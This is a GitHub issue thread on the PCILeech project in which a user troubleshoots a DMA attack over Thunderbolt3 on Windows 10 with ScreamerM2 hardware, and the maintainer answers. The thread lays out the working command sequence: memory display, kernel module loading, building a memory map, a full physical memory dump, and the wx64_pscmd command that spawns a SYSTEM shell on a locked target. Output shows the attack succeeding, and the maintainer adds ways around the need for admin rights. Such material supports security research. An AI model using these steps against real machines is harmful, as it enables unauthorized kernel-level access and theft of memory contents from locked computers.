ScreamerM2 Failed to load kernel module.

Hi,

I just recieved my ScreamerM2. Now I got some problems using it. I want to attack a Windows 10 19041.746 via Thunderbolt3. Right after a reboot the display command seams to work without any problem:

C:\Users\user\Downloads\PCILeech_files_and_binaries_v4.8-20210202>pcileech.exe display -min 0x1000 -max 0x2000 -device fpga://algo=2 -v

DEVICE: FPGA: ScreamerM2 PCIe gen2 x1 [300,25,500] [v4.7,0a00] [SYNC,NORM]
Memory Display: Contents for address: 0x0000000000001000
0000    e9 4d 06 00 01 00 00 00  01 00 00 00 3f 00 18 10   .M..........?...
0010    00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   ................
0020    00 00 00 00 00 00 00 00  00 00 00 00 00 9b 20 00   .............. .
0030    00 00 00 00 00 00 00 00  ff ff 00 00 00 93 cf 00   ................
0040    00 00 00 00 00 00 00 00  ff ff 00 00 00 9b cf 00   ................
0050    00 00 00 00 00 00 00 00  00 70 05 9a 00 00 00 00   .........p......
0060    7c 16 00 00 30 00 da 16  00 00 10 00 00 00 00 00   |...0...........
0070    e0 15 3f 2a 06 f8 ff ff  00 80 00 c0 af f7 ff ff   ..?*............
0080    06 01 07 00 06 01 07 00  01 09 00 00 00 00 00 00   ................
0090    33 00 05 80 00 00 00 00  00 00 00 00 00 00 00 00   3...............
00a0    00 a0 1b 00 00 00 00 00  78 06 37 00 00 00 00 00   ........x.7.....
00b0    00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   ................
00c0    00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   ................
00d0    00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   ................
00e0    00 00 00 00 00 00 57 00  b0 af 9d 65 00 d1 ff ff   ......W....e....
00f0    00 00 00 00 00 00 ff 0f  00 80 9d 65 00 d1 ff ff   ...........e....

As can be seen in the output I am using PCILeech 4.8. The ScreamerM2 came preflashed with v4.7. could this missmatch cause problems?

As soon as I try anything else (kmdload, probe, ...) something breaks and I also can't use display anymore.

When using kmdload I get following output:

C:\Users\user\Downloads\PCILeech_files_and_binaries_v4.8-20210202>pcileech.exe kmdload -kmd WIN10_X64_2 -device fpga://algo=2 -vv

----- FPGA DEVICE CONFIG REGISTERS: CORE-READ-ONLY     SIZE: 35 BYTES -----
0000    89 ab 00 00 23 00 00 00  04 07 04 00 00 00 00 00   ....#...........
0010    e0 de 5a 3e 03 00 00 00  e2 de 5a 3e 03 00 00 00   ..Z>......Z>....
0020    00 00 03                                           ...

----- FPGA DEVICE CONFIG REGISTERS: CORE-READ-WRITE    SIZE: 30 BYTES -----
0000    cd 8f 04 00 1e 00 00 00  a0 86 01 00 00 00 00 00   ................
0010    ea 10 07 00 ee 10 66 06  02 3c 00 00 7f 00         ......f..<.. .

----- FPGA DEVICE CONFIG REGISTERS: PCIE-READ-ONLY     SIZE: 48 BYTES -----
0000    01 23 00 00 30 00 00 00  0a 00 16 08 5c 00 00 00   .#..0.......\...
0010    00 00 00 00 06 00 00 00  10 29 00 00 01 00 00 00   .........)......
0020    12 10 00 00 1e 7f 00 00  00 00 7f f8 00 00 00 00   ..... .... .....

----- FPGA DEVICE CONFIG REGISTERS: PCIE-READ-WRITE    SIZE: 88 BYTES -----
0000    45 67 00 f0 58 00 00 00  35 0a 00 01 01 00 00 00   Eg..X...5.......
0010    00 00 00 00 7f f0 48 00  00 00 00 0e 00 00 00 00   .... .H.........
0020    00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   ................
0030    00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   ................
0040    00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   ................
0050    00 00 00 00 24 f4 00 00                            ....$...

----- PCIe CORE Dynamic Reconfiguration Port (DRP)  SIZE: 0x100 BYTES -----
0000    00 00 00 01 00 02 00 00  00 00 00 00 00 00 f0 00   ................
0010    ff ff 00 00 00 00 00 00  00 00 00 00 00 00 00 00   ................
0020    00 00 00 00 00 00 00 00  00 00 00 40 00 00 00 00   ...........@....
0030    00 00 09 02 30 00 22 7f  02 00 01 00 00 03 11 0c   ....0." ........
0040    02 a1 00 43 01 00 1f fd  7f ff 09 ff 01 20 01 48   ...C.... .... .H
0050    00 05 01 60 11 9c 00 00  00 00 00 00 00 00 00 00   ...`............
0060    00 00 10 60 00 02 40 21  00 40 3d 48 00 23 00 00   ...`..@!.@=H.#..
0070    00 00 00 00 00 00 00 00  00 00 00 00 00 15 00 01   ................
0080    00 01 00 00 00 01 00 00  00 01 00 00 00 01 00 00   ................
0090    00 01 00 00 00 01 00 00  00 00 00 00 00 00 00 00   ................
00a0    00 00 00 00 00 00 00 00  00 02 00 00 12 34 10 18   .............4..
00b0    00 0b 00 01 00 11 00 00  00 00 00 00 00 01 00 00   ................
00c0    00 28 00 41 ff ff ff ff  00 e0 00 00 80 08 00 22   .(.A..........."
00d0    07 ff 03 52 02 48 00 08  00 40 0e 84 fa ac 00 00   ...R.H...@......
00e0    00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   ................
00f0    00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   ................

----- PCIe CONFIGURATION SPACE (no user set values) SIZE: 0x200 BYTES -----
0000    ee 10 66 06 06 00 10 00  02 00 00 02 20 00 00 00   ..f......... ...
0010    00 00 00 d4 00 00 00 00  00 00 00 00 00 00 00 00   ................
0020    00 00 00 00 00 00 00 00  00 00 00 00 ee 10 07 00   ................
0030    00 00 00 00 40 00 00 00  00 00 00 00 ff 01 00 00   ....@...........
0040    01 48 03 78 08 00 00 00  05 60 80 00 00 00 00 00   .H.x.....`......
0050    00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   ................
0060    10 00 02 00 e2 8f 00 00  10 29 01 00 12 f4 03 00   .........)......
0070    00 00 12 10 00 00 00 00  00 00 00 00 00 00 00 00   ................
0080    00 00 00 00 02 00 00 00  00 00 00 00 00 00 00 00   ................
0090    02 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   ................
00a0    00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   ................
00b0    00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   ................
00c0    00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   ................
00d0    00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   ................
00e0    00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   ................
00f0    00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   ................
0100    03 00 c1 10 35 0a 00 01  01 00 00 00 00 00 00 00   ....5...........
0110    00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   ................
0120    00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   ................
0130    00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   ................
0140    00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   ................
0150    00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   ................
0160    00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   ................
0170    00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   ................
0180    00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   ................
0190    00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   ................
01a0    00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   ................
01b0    00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   ................
01c0    00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   ................
01d0    00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   ................
01e0    00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   ................
01f0    00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   ................

----- PCIe SHADOW CONFIGURATION SPACE (only user set values) SIZE: 0x1000 BYTES -----
0000    00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   ................
...
0ff0    00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   ................

LcMemMap_AddRange: 0000000000000000-000000000009ffff -> 0000000000000000
LcMemMap_AddRange: 0000000000100000-0000000250000fff -> 0000000000100000
LeechCore v2.3.0: Open Device: fpga
MemProcFS: Failed to initialize memory process file system in call to vmm.dll!VMMDLL_Initialize
KMD: Failed initializing required MemProcFS/vmm.dll
PCILEECH: Failed to load kernel module.

Can anyone help me with this problem?

it's nice to see it's working for you after a fresh boot; then we know DMA is actually working.

Thunderbolt3 is hyper-sensitive against reads outside allowed memory regions. If such a read takes place then it will stop working.

You would need to use the -memmap option to specify a memory map so that PCILeech will keep only inside valid memory regions.

If you're lucky -memmap auto will work. If unlucky you would need to specify it manually from within a file - i.e. -memmap c:\temp\your_memory_map.txt.

Easiest way to retrieve it is probably use DumpIt.exe to create a memory dump of your target system. Then open the dump in my MemProcFS tool - https://github.com/ufrisk/MemProcFS where you'll find the dump file at: M:\sys\memory\physmemmap.txt

(also, WIN10_X64_3 is more stable than WIN10_X64_2, but first you would need to get it working with the Thunderbolt)

Please let me know how it goes. Try the -memmap auto first.

Also, if you find PCILeech / MemProcFS useful please consider sponsoring the project here on Github. I see people purchasing hardware for hundreds of dollars (of which I receive absolutely zero dollars for - since I'm not related to hardware sales) just to be able to run my free open source software. Sponsorships go for as little as $2 and Github is matching it - a $2 sponsorship for you is a $4 sponsorship for me. Thank You 💖

I already tried -memmap auto which did not work if I remember correctly.

I will try the way you described on Friday, I will let you know if it works.

Is the memorymap specific to the OS version or to the hardware?

It's related to the hardware, not the OS. if you re-flash bios it may change otherwise it should be fine I think.

Please let me know how it goes.

Hi Ulf,

I just verified, -memmap auto does not work in this case.

After I created a memorymap using RamMap I was able to read most of the pages as you can see here:

C:\Users\user\Downloads\PCILeech_files_and_binaries_v4.8-20210202>pcileech.exe dump -device fpga -memmap newmap.txt

Memory Dump: Initializing ... Done.
 Current Action: Dumping Memory
 Access Mode:    Normal
 Progress:       10984 / 10984 (100%)
 Speed:          159 MB/s
 Address:        0x0000000100000000
 Pages read:     2064456 / 2811904 (73%)
 Pages failed:   747448 (26%)
Memory Dump: Successful.

I am also able to get a system shell using the WIN10_X64_3 module:

C:\Users\user\Downloads\PCILeech_files_and_binaries_v4.8-20210202>pcileech.exe wx64_pscmd -kmd 0x498a1000 -device FPGA -memmap newmap.txt

EXEC: SUCCESS! shellcode should now execute in kernel!
Please see below for results.

PROCESS CREATOR - AUTOMATICALLY SPAWN CMD.EXE ON TARGET!
================================================================
Automatically spawn a CMD.EXE on the target system. This utility
only work if the target system is locked and the login screen is
visible. If it takes time waiting - then please touch any key on
the target system.   If the utility fails multiple times, please
try wx64_pscreate instead.
===== DETAILED INFORMATION AFTER PROCESS CREATION ATTEMPT ======
NTSTATUS        : 0x00000000
ADDITIONAL INFO : 0x0000
================================================================
Microsoft Windows [Version 10.0.19042.746]
(c) 2020 Microsoft Corporation. All rights reserved.

C:\Windows\system32>

Using the WIN10_X64_2 module I get a blue screen saying ATTEMPTED_EXECUTE_OF_NOEXECUTE_MEMORY. Using WIN10_X64 freezes the victim OS.

Seeing this work is really nice, but it kind of breaks my attacker model since I need admin privileges to get the memorymap (correct me if i am wrong).

So far I do not quite understand how the -memmap auto function works and why it works only in some cases. I should probably take a look at the code for this :)

The memory map will be the same across same model of devices with the same amount of memory.

The -memmap auto sometimes fail because I currently initialize the whole MemProcFS system in the background (via API calls) and read the memory map from the Windows registry to parse it out. That is a lot of reads that can go wrong. I'll switch the registry reading (which is complex) to reading it from the kernel. This won't completely solve the issue; but it will make it somewhat more likely that it will succeed.

This is unfortunately the way how things are; but the memmap should at least be very similar/same across similar devices; so it won't really break the attacker model for rich attackers... Also, if it's auto-booting you can try to dump as much memory as you can using PCILeech with an own memory map; then try to parse the proper one out with MemProcFs... Or just boot on USB to another OS and parse the memory map from there :)

Anyway; it's super nice to see it's working for you. I'll close the issue now since it seems like it's resolved. Please let me know if there are any outstanding issues around this; otherwise I wish you the best luck with your DMA attacks.

Also, if you should find PCILeech / MemProcFS useful please consider sponsoring the project here on Github. I see people purchasing hardware for hundreds of dollars (of which I receive absolutely zero dollars of) just to be able to run my free open source software. Sponsorships go for as little as $2 and Github is matching it - a $2 sponsorship for you is a $4 sponsorship for me. Thank You 💖

ufrisk / pcileech

ScreamerM2 Failed to load kernel module. #163